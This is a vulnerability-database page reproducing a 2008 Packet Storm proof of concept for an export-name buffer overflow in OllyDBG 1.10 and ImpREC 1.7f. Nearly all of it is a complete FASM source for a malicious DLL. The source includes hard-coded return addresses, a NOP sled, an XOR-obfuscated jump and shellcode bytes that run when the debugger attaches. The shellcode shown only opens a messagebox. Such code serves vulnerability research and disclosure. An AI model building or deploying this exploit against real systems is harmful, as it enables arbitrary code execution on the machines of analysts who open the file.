Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ollydbg-overflow.txt

🗓️ 10 Jul 2008 00:00:00Reported by DefsangujeType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 22 Views

OllyDBG ImpREC export name buffer overflow vulnerability PoC for loading DLL and executing shellcod

Code
`;-------------------------------------------------------------------------;  
; OllyDBG v1.10 and ImpREC v1.7f export name buffer overflow vulnerability  
; PoC (probably older versions affected too, not tested though.)   
;  
; Included shellcode shows a messagebox (WinXP SP2) and is configured for  
; OllyDBG. See lines 60-105 for more details  
;-------------------------------------------------------------------------;  
; Usage:  
; Load this DLL to your process and try to attach OllyDBG or ImpREC  
; to it -> Shellcode executed >:)  
;  
; Shellcode gets fired also if program is run under OllyDBG.  
;  
; Bug discovered and PoC coded by:  
; ~ Defsanguje, Defsanguje [at] gmail [dot] com [July 7 2008]  
;-------------------------------------------------------------------------;  
; Coded in FASM  
;-------------------------------------------------------------------------;  
  
format PE GUI 4.0 DLL  
  
include 'win32a.inc'  
entry DllEntryPoint  
  
section '.code' code readable executable  
  
proc DllEntryPoint, hinstDLL,fdwReason,lpvReserved  
mov eax, TRUE  
ret  
endp  
  
;-------------------------------------------------------------------------;  
; Modified version from original export-macro.  
;-------------------------------------------------------------------------;  
macro ExportExploit dllname,[label]  
{ common  
local module,addresses,names,ordinal,count  
count = 0  
forward  
count = count+1  
common  
dd 0,0,0,RVA module,1  
dd count,count,RVA addresses,RVA names,RVA ordinal  
addresses:  
forward  
dd RVA label  
common  
names:  
forward  
local name  
dd RVA name  
common  
ordinal: count = 0  
forward  
dw count  
count = count+1  
common  
module db dllname,0  
forward  
  
;-------------------------------------------------------------------------;  
; Exploit for OllyDBG v1.10  
;-------------------------------------------------------------------------;  
a: name\  
db 3e0h dup (90h)  
dd 6d553b78h ; ESP to EBP  
dd 6d55e5ffh ; EBP to EAX  
dd 0defdefdeh  
dd 0defdefdeh  
dd 6d56d25eh ; add eax, 40h  
dd 0defdefdeh  
dd 6d52e1efh ; jmp EAX =)  
db 40h-18h dup(90h)  
c: push eax  
mov eax, (ShellCodeStart-c) xor 0defdefdeh  
xor eax, 0defdefdeh  
add eax, [esp]  
jmp eax  
b: db 0bd0h - (ShellCodeEnd-ShellCodeStart) - (b-a) dup (90h)  
  
ShellCodeStart:  
db 81h,0ECh,07Dh,0FFh,0FFh,0FFh  
db 2Bh,0C9h,51h,51h,51h,51h,51h,0BBh  
db 8Ah,05h,45h,7Eh ; Address of messagebox in winxp sp2  
db 0FFh,0D3h  
ShellCodeEnd:  
dd 0045F823h ; New EIP  
  
db 300h dup(90h)  
db 0  
  
;-------------------------------------------------------------------------;  
; Exploit for ImpREC v1.7f  
;-------------------------------------------------------------------------;  
; name\  
; db 0C0Ch - (ShellCodeEnd-ShellCodeStart) dup (90h)  
;ShellCodeStart:  
; db 81h,0ECh,07Dh,0FFh,0FFh,0FFh  
; db 2Bh,0C9h,51h,51h,51h,51h,51h,0BBh  
; db 8Ah,05h,45h,7Eh ; Address of messagebox in winxp sp2  
; db 0FFh,0D3h  
;ShellCodeEnd:  
; dd 12c1b8h ; New EIP  
; db 0  
;-------------------------------------------------------------------------;  
  
common  
local x,y,z,str1,str2,v1,v2  
x = count shr 1  
while x > 0  
y = x  
while y < count  
z = y  
while z-x >= 0  
load v1 dword from names+z*4  
str1=($-RVA $)+v1  
load v2 dword from names+(z-x)*4  
str2=($-RVA $)+v2  
while v1 > 0  
load v1 from str1+%-1  
load v2 from str2+%-1  
if v1 <> v2  
break  
end if  
end while  
if v1<v2  
load v1 dword from names+z*4  
load v2 dword from names+(z-x)*4  
store dword v1 at names+(z-x)*4  
store dword v2 at names+z*4  
load v1 word from ordinal+z*2  
load v2 word from ordinal+(z-x)*2  
store word v1 at ordinal+(z-x)*2  
store word v2 at ordinal+z*2  
else  
break  
end if  
z = z-x  
end while  
y = y+1  
end while  
x = x shr 1  
end while }  
  
section '.edata' export data readable  
;-------------------------------------------------------------------------;  
; Call the macro  
;-------------------------------------------------------------------------;  
ExportExploit 'exploit.dll',\  
$  
  
;-------------------------------------------------------------------------;  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Jul 2008 00:00Current
7.4High risk
Vulners AI Score7.4
ollydbgimprecbuffer overflowshellcodedllvulnerabilitypoc
22